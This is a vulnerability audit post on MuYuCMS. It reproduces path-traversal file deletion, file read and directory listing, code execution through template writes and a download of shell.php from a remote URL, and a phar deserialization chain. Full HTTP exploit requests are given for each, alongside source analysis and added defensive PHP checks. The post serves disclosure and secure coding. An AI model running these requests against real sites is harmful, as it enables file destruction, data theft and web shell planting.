MuYuCMS code audit summary

锦通 (Gold Member) | 2023-2-22 11:32:12

MuYuCMS is a lightweight open-source content management system built on ThinkPHP, aimed at giving companies and individual site owners a quick way to set up a website.
[img=720,620.2816901408451]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455023.png[/img]

Environment setup

We use phpstudy to build the environment, choosing Apache 2.4.39 + MySQL 5.7.26 + PHP 5.6.9, and use PhpStorm to debug the project.
[img=720,408.66995073891627]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455026.png[/img]

Vulnerability reproduction and analysis

Arbitrary file deletion

We create a file test.txt in the site's root directory to verify whether the file gets deleted.
[img=720,129.90978487161692]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455028.png[/img]
Arbitrary file deletion 1

Reproduction
After logging in to the admin backend, craft the following request:
[code]POST /admin.php/accessory/filesdel.html HTTP/1.1
Host: test.test
Content-Length: 55
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/admin.php/accessory/filelist.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718;XDEBUG_SESSION=PHPSTORM
Connection: close
filedelur=/upload/files/.gitignore/../../../../test.txt[/code]
[img=720,322.64150943396226]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455029.png[/img]
The file is deleted successfully.
[img=720,124.93827160493827]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455030.png[/img]
Analysis
\app\admin\controller\Accessory::filesdel
[img=720,316.8463395012068]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455031.png[/img]
The path of the file to delete is built by concatenating the $filedelurl parameter, and the file is removed with the unlink function; no validation happens in between.
Arbitrary file deletion 2

Reproduction
After logging in to the admin backend, craft the following request:
[code]POST /admin.php/accessory/picdel.html HTTP/1.1
Host: test.test
Content-Length: 54
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/admin.php/accessory/filelist.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718;XDEBUG_SESSION=PHPSTORM
Connection: close
picdelur=/upload/files/.gitignore/../../../../test.txt[/code]
[img=720,321.75617404939237]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455032.png[/img]
Analysis
\app\admin\controller\Accessory::picdel
[img=720,314.61444308445533]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455033.png[/img]
The path of the image to delete is built by concatenating the $picdelur parameter, and the file is removed with the unlink function; no validation happens in between.
Arbitrary file deletion 3

Reproduction
After logging in to the admin backend, craft the following request:
[code]GET /editor/index.php?a=delete_node&type=file&path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close[/code]
[img=720,322.6029008232066]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455034.png[/img]
Analysis
\App\Controller\Controller::delete_node
[img=720,262.4970083765457]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455035.png[/img]
\App\Core\File::deleteFile
[img=720,192.6315789473684]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455036.png[/img]
\App\Controller\Controller::beforeFun
[img=720,299.9283154121864]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455037.png[/img]
The incoming path is checked to lie within the permitted file domain, but it is never checked for directory traversal before the file is deleted.
Arbitrary file deletion 4

Reproduction
[code]POST /admin.php/database/sqldel.html HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
name=../../test.txt[/code]
[img=720,321.7261671243625]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455038.png[/img]
Analysis
\app\admin\controller\Database::sqldel
[img=720,335.22419186652763]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455039.png[/img]
The name parameter is read from the POST body.
[img=720,157.99488491048592]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455040.png[/img]
The file is then deleted with the delFile function.
Arbitrary file deletion 5

Reproduction
After logging in to the admin backend, craft the following request:
[code]POST /admin.php/update/rmdirr.html?dirname=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1
Host: test.test
Content-Length: 0
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: http://test.test
Referer: http://test.test/admin.php/system/update.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=d3bt6cnt59c2dfq7pshva5ffc1; muyu_checkaccre=1676878715; muyu_first=1676879341
Connection: close[/code]
[img=720,320.814408770556]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455041.png[/img]
Analysis
\app\admin\controller\Update::rmdirr
[img=720,298.45906902086676]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455042.png[/img]
The $dirname parameter passes only a simple check before the unlink function is called on it.
Arbitrary file read

Reproduction
After logging in, craft the following request:
[code]GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close[/code]
[img=720,324.3243243243243]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455043.png[/img]
The file contents are read successfully.
[img=720,124.94117647058823]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455044.png[/img]
Analysis
\App\Controller\Controller::get_file
[img=720,295.99356395816574]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455045.png[/img]
Directory listing

Reproduction
After logging in, craft the following request:
[code]GET /editor/index.php?a=dir_list&dir_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../../../../../../../../ HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close[/code]
[img=720,319.3730407523511]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455046.png[/img]
The contents of the root directory are exposed.
Analysis
\App\Controller\Controller::dir_list
[img=720,169.0887193898033]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455047.png[/img]
\App\Core\Jstree::getDir
[img=720,271.219]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455048.png[/img]
\App\Controller\Controller::beforeFun
[img=720,299.9283154121864]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455037.png[/img]
The incoming dir_path is checked to lie within the permitted file domain, but it is never checked for directory traversal before the directory contents are printed.
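Added example, not MuYuCMS code: every finding so far (the five deletion paths, get_file and dir_list) has the same root cause, a user-controlled path reaching unlink(), file_get_contents() or the directory listing either unchecked or checked only by a string-prefix test on the raw, unresolved path. The script below reproduces that prefix test, shows the page's traversal shape slipping past it, and contrasts a realpath()-based gate that confines the resolved path to an allowed base directory. The helper names, the temporary directory layout and the PHP 7.1+ requirement are assumptions; the traversal payload walks through directories only so it behaves the same on Linux as on the author's Windows setup (the page's .gitignore/.. variant relies on Windows path normalisation tolerating ".." after a regular file).

```php
<?php
// Added example, not MuYuCMS code: confine a user-supplied path to a base
// directory with realpath() before it reaches unlink()/file_get_contents()/scandir().
// Directory layout, helper names and payload strings are constructed for this demo.

declare(strict_types=1);

/**
 * The kind of check the page describes: a prefix test on the raw path.
 * "<base>/files/../../test.txt" starts with "<base>", so it passes.
 */
function naivePrefixCheck(string $base, string $path): bool
{
    return strncmp($path, $base, strlen($base)) === 0;
}

/**
 * Canonicalise $candidate and return it only if it lies inside $base.
 * Returns null for paths that escape $base, do not exist, or carry a stream
 * wrapper such as phar:// (realpath() refuses wrappers anyway; the explicit
 * test just gives the audit log a clear reason).
 */
function resolveInsideBase(string $base, string $candidate): ?string
{
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $candidate) === 1) {
        return null;
    }
    $realBase = realpath($base);
    $real     = realpath($candidate);
    if ($realBase === false || $real === false) {
        return null;
    }
    // Append the separator so "/www/upload" does not match "/www/upload_old".
    $prefix = rtrim($realBase, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($real !== $realBase && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

/**
 * Hardened shape of filesdel()/picdel(): the controller still concatenates
 * webroot + user input, but only a file resolved inside $allowedDir is deleted.
 */
function safeDelete(string $webroot, string $allowedDir, string $userPath): bool
{
    $real = resolveInsideBase($allowedDir, $webroot . $userPath);
    if ($real === null || !is_file($real)) {
        return false;
    }
    return unlink($real);
}

// --- constructed demo layout under the temp dir ---
$webroot = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'muyu_demo_' . getmypid();
mkdir($webroot . '/upload/files', 0700, true);
file_put_contents($webroot . '/upload/files/a.txt', 'inside');
file_put_contents($webroot . '/test.txt', 'outside');   // the file the page deletes

$allowed   = $webroot . '/upload';
$legit     = '/upload/files/a.txt';
$traversal = '/upload/files/../../test.txt';   // same shape as the page's payload, directories only

printf("naive check,    traversal: %s\n", naivePrefixCheck($allowed, $webroot . $traversal) ? 'ALLOWED' : 'blocked');
printf("realpath check, traversal: %s\n", resolveInsideBase($allowed, $webroot . $traversal) === null ? 'blocked' : 'ALLOWED');
printf("realpath check, legit:     %s\n", resolveInsideBase($allowed, $webroot . $legit) === null ? 'blocked' : 'ALLOWED');
printf("realpath check, phar://:   %s\n", resolveInsideBase($allowed, 'phar://' . $webroot . $legit) === null ? 'blocked' : 'ALLOWED');

printf("safeDelete traversal: %s, test.txt still exists: %s\n",
    var_export(safeDelete($webroot, $allowed, $traversal), true),
    var_export(is_file($webroot . '/test.txt'), true));
printf("safeDelete legit:     %s\n", var_export(safeDelete($webroot, $allowed, $legit), true));

// cleanup of the constructed layout
unlink($webroot . '/test.txt');
rmdir($webroot . '/upload/files');
rmdir($webroot . '/upload');
rmdir($webroot);
```

Two caveats on the design: realpath() returns false for a target that does not exist, so reads and deletes fail closed, but for a write (the save_file and getFile cases later on the page) the check must be applied to the parent directory and the file name chosen server-side. And because realpath() also refuses stream wrappers, the same gate rejects the phar:// path the final section uses to reach rmdirr.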
Arbitrary code execution

Arbitrary code execution 1

Reproduction
After logging in, craft a request that reads the config file:
[code]GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close[/code]
What we need here is not the file contents but the file key that the subsequent modification requires.
[img=720,321.031652989449]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455049.png[/img]
Copy the file checksum and substitute it into the following request:
[code]GET /editor/index.php?a=save_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php&file_key=5e9c862ce52986e5437652d707c7c82f&file_content=<?php+phpinfo();+php?> HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close[/code]
[img=720,319.3388429752066]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455050.png[/img]
Visiting the file's location on the site shows that the code was executed.
[img=720,179.908768373036]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455051.png[/img]
Other code can be executed as well.
[img=720,277.40506329113924]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455052.png[/img]
Analysis
\App\Controller\Controller::save_file
[img=720,138.0505415162455]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455053.png[/img]
save_file writes the file, but it requires the file's checksum; so one can first query the file's information and then modify the file.
\App\Core\File::setFileContent
[img=720,423.2204273058885]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455054.png[/img]
Arbitrary code execution 2

Reproduction
After logging in, craft the following request:
[code]POST /admin.php/update/getFile.html?url=http://127.0.0.1:8000/shell.php&save_dir=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/ HTTP/1.1
Host: test.test
Content-Length: 0
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: http://test.test
Referer: http://test.test/admin.php/system/update.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=d3bt6cnt59c2dfq7pshva5ffc1; muyu_checkaccre=1676878715; muyu_first=1676879341;XDEBUG_SESSION=PHPSTORM
Connection: close[/code]
A remote URL is specified to download a file, and the downloaded file is saved to the specified location.
[img=720,317.2737955346651]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455055.png[/img]
Visiting the specified directory shows that the code was executed.
[img=720,404.7257383966245]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455056.png[/img]
Analysis
\app\admin\controller\Update::getFile
[img=720,385.98326359832635]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455057.png[/img]
$url specifies the address of the remote file to fetch and $save_dir the path to save it to; neither the file's content nor its type is validated, which yields a code execution vulnerability.
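Added example, not MuYuCMS code, of what a hardened "fetch a remote file into save_dir" action would have to check before writing: the save directory is confined to an upload base, the extension comes from an allow list, the declared Content-Type must agree with it, the bytes must actually decode as that image type, and the file name is chosen by the server rather than taken from the URL. The helper names, the allow list and the PHP 7.1+ requirement are assumptions; network I/O is replaced by constructed responses (reusing the http://127.0.0.1:8000/shell.php URL from the request above) so the script runs offline.

```php
<?php
// Added example, not MuYuCMS code: validation a remote-download action should
// perform before writing the body to disk. Responses below are constructed.

declare(strict_types=1);

// Allow list: extension => the MIME type the bytes must decode to.
const ALLOWED_EXT = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'gif' => 'image/gif'];

/**
 * Case-insensitive header lookup over "$http_response_header"-style lines.
 * HTTP header names are not case-sensitive, so "Content-type" from one
 * server must match the same check as "Content-Type" from another.
 */
function headerValue(array $headers, string $name): ?string
{
    foreach ($headers as $line) {
        $parts = explode(':', $line, 2);
        if (count($parts) === 2 && strcasecmp(trim($parts[0]), $name) === 0) {
            return trim($parts[1]);
        }
    }
    return null;
}

/**
 * Return ['ok', <destination path>] when the fetched response may be written,
 * otherwise ['error', <reason>]. Nothing is written here.
 */
function validateRemoteImage(string $url, array $headers, string $body, string $saveDir, string $baseDir): array
{
    // 0. save_dir must resolve inside the upload base (realpath collapses "..").
    $realSave = realpath($saveDir);
    $realBase = realpath($baseDir);
    if ($realSave === false || $realBase === false) {
        return ['error', 'save_dir does not exist'];
    }
    $prefix = rtrim($realBase, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($realSave !== $realBase && strncmp($realSave, $prefix, strlen($prefix)) !== 0) {
        return ['error', 'save_dir escapes the upload base'];
    }
    // 1. Extension taken from the URL path and checked against the allow list.
    $ext = strtolower(pathinfo((string) parse_url($url, PHP_URL_PATH), PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_EXT)) {
        return ['error', "extension '$ext' not allowed"];
    }
    // 2. Declared Content-Type (parameters such as charset stripped) must agree.
    $ct = strtolower((string) strtok((string) headerValue($headers, 'Content-Type'), ';'));
    if ($ct !== ALLOWED_EXT[$ext]) {
        return ['error', "content-type '$ct' does not match .$ext"];
    }
    // 3. The bytes must parse as that image type: a script renamed .png fails here.
    $info = @getimagesizefromstring($body);
    if ($info === false || strtolower($info['mime']) !== ALLOWED_EXT[$ext]) {
        return ['error', 'body is not a valid image of the declared type'];
    }
    // 4. Server-chosen name: the remote file name never reaches the filesystem.
    $name = bin2hex(random_bytes(8)) . '.' . $ext;
    return ['ok', $realSave . DIRECTORY_SEPARATOR . $name];
}

// --- constructed demo: upload base with a template/ subdirectory ---
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'muyu_fetch_' . getmypid();
mkdir($base . '/template', 0700, true);
$png  = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='); // 1x1 PNG
$stub = '<?php echo "stub"; ?>';   // constructed stand-in for a script body

$cases = [
    'script named .php'          => ['http://127.0.0.1:8000/shell.php', ['Content-Type: text/html'], $stub, $base . '/template'],
    'script named .png'          => ['http://127.0.0.1:8000/shell.png', ['Content-type: image/png'], $stub, $base . '/template'],
    'real png, lowercase header' => ['http://127.0.0.1:8000/logo.png',  ['Content-type: image/png'], $png,  $base . '/template'],
    'real png, save_dir escapes' => ['http://127.0.0.1:8000/logo.png',  ['Content-Type: image/png'], $png,  $base . '/template/../..'],
];
foreach ($cases as $label => [$url, $headers, $body, $dir]) {
    [$status, $detail] = validateRemoteImage($url, $headers, $body, $dir, $base);
    printf("%-28s %-5s %s\n", $label, $status, $detail);
}

rmdir($base . '/template');
rmdir($base);
```

The header lookup is deliberately case-insensitive, and that is also what the Content-Type / Content-type mismatch in the phar section's notes comes down to: a check that accepts only one spelling of a header name breaks against servers that emit the other (Python's http.server sends "Content-type"), so such a check fails on correct traffic while still saying nothing about the body. Only step 3, decoding the bytes, tells a script from an image.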
phar deserialization

Reproduction
1. Generate the phar payload, change its extension, and start a Python HTTP server.
2. Craft a request that downloads the remote file onto the server:
[code]GET /public/static/admin/static/ueditor/php/controller.php?action=catchimage&source[]=http://127.0.0.1:8000/shell.png HTTP/1.1
Host: test.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XDEBUG_SESSION=PHPSTORM
Connection: close[/code]
[img=720,323.25381306218225]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455059.png[/img]
Trigger the phar deserialization:
http://test.test/admin.php/update/rmdirr.html?dirname=phar://./public/upload/images/1676882763141961.png
[img=720,358.5943600867679]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455060.png[/img]

Notes
At first, while fetching the remote image, I kept getting an error saying 链接contentType不正确 (the link's contentType is incorrect). Searching through the code, I located the problem:
[img=720,86.00878945265681]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455061.png[/img]
It validates the value of Content-Type. After repeated debugging I still could not find where the problem was,
but I noticed that serving the file through phpstudy's default Apache worked fine. Comparing captured packets showed that one sent Content-Type and the other Content-type.
[img=720,253.2824427480916]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455062.png[/img]
[img=720,308.3100381194409]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455063.png[/img]
I directly modified the Python source, replacing the lowercase t with an uppercase T.
Analysis
\app\admin\controller\Update::rmdirr
[img=720,261.15649009300444]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455064.png[/img]
The protocol wrapper bypasses the file name check and then triggers the deserialization vulnerability.
MuYuCMS-master/public/static/admin/static/ueditor/php/controller.php
[img=720,96.87958115183245]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455065.png[/img]
[img=720,396.76056338028167]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455066.png[/img]
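Added example, not MuYuCMS or UEditor code: two defender-side checks for the chain just described. The first is an upload-time scanner for the catchimage step: a phar archive, whatever image header is prepended to it, must contain the stub terminator __HALT_COMPILER(), so that marker (and a PHP open tag) in something accepted as an image is a reliable signal. The second is a path gate for the rmdirr step that refuses any stream-wrapper scheme before a file-name parameter reaches is_dir(), file_exists() or unlink(), which is where the phar metadata gets unserialized. Helper names and sample bytes are constructed; the upload path is the one from the trigger URL above.

```php
<?php
// Added example, not MuYuCMS or UEditor code: detect phar/script payloads in
// "image" uploads and refuse stream wrappers in path parameters. Samples are constructed.

declare(strict_types=1);

/**
 * Return the markers found in $bytes: the phar stub terminator and/or a PHP
 * open tag. An empty array means neither marker is present.
 */
function scanImageUpload(string $bytes): array
{
    $findings = [];
    if (stripos($bytes, '__HALT_COMPILER') !== false) {
        $findings[] = 'phar stub marker';
    }
    // "<?php" or "<?="; the plain "<?" form is skipped to avoid flagging "<?xml".
    if (preg_match('/<\?php\b|<\?=/i', $bytes) === 1) {
        $findings[] = 'php open tag';
    }
    return $findings;
}

/** True when $path starts with a stream-wrapper scheme (phar://, data://, php://, ...). */
function hasStreamWrapper(string $path): bool
{
    return preg_match('#^\s*[a-z][a-z0-9+.\-]*://#i', $path) === 1;
}

/**
 * Shape of a safe pre-check for rmdirr(): refuse wrappers, then require the
 * path to resolve inside $base before any filesystem call sees it.
 */
function pathAcceptable(string $base, string $path): bool
{
    if (hasStreamWrapper($path)) {
        return false;
    }
    $realBase = realpath($base);
    $real     = realpath($path);
    if ($realBase === false || $real === false) {
        return false;
    }
    $prefix = rtrim($realBase, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return $real === $realBase || strncmp($real, $prefix, strlen($prefix)) === 0;
}

// --- constructed upload bodies ---
$pngHeader = "\x89PNG\r\n\x1a\n";
$samples = [
    'plain png header'   => $pngHeader . str_repeat("\0", 16),
    'png + phar stub'    => $pngHeader . '<?php __HALT_COMPILER(); ?>' . 'archive-bytes',
    'script named png'   => '<?php echo "stub"; ?>',
    'svg with xml decl'  => '<?xml version="1.0"?><svg/>',
];
foreach ($samples as $label => $bytes) {
    $f = scanImageUpload($bytes);
    printf("%-20s %s\n", $label, $f ? 'REJECT: ' . implode(', ', $f) : 'ok');
}

// --- path parameters, including the trigger from the page ---
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'muyu_phar_' . getmypid();
mkdir($base . '/public/upload/images', 0700, true);
file_put_contents($base . '/public/upload/images/1676882763141961.png', $pngHeader);
$paths = [
    $base . '/public/upload/images/1676882763141961.png',
    'phar://' . $base . '/public/upload/images/1676882763141961.png',
    'PHAR://./public/upload/images/1676882763141961.png',
    $base . '/public/upload/images/../../../../../etc/passwd',
];
foreach ($paths as $p) {
    printf("%-70s %s\n", $p, pathAcceptable($base, $p) ? 'ok' : 'REJECT');
}

// cleanup of the constructed layout
unlink($base . '/public/upload/images/1676882763141961.png');
rmdir($base . '/public/upload/images');
rmdir($base . '/public/upload');
rmdir($base . '/public');
rmdir($base);
```

The scan is a signal, not a parser: a polyglot can hide the stub behind compression in some formats, so it complements rather than replaces re-encoding uploaded images server-side. On the trigger side, PHP 8.0 stopped unserializing phar metadata automatically when a phar:// path is touched by a file operation, which removes this particular sink; on older releases the wrapper gate above is the practical control, and it costs nothing to keep on newer ones.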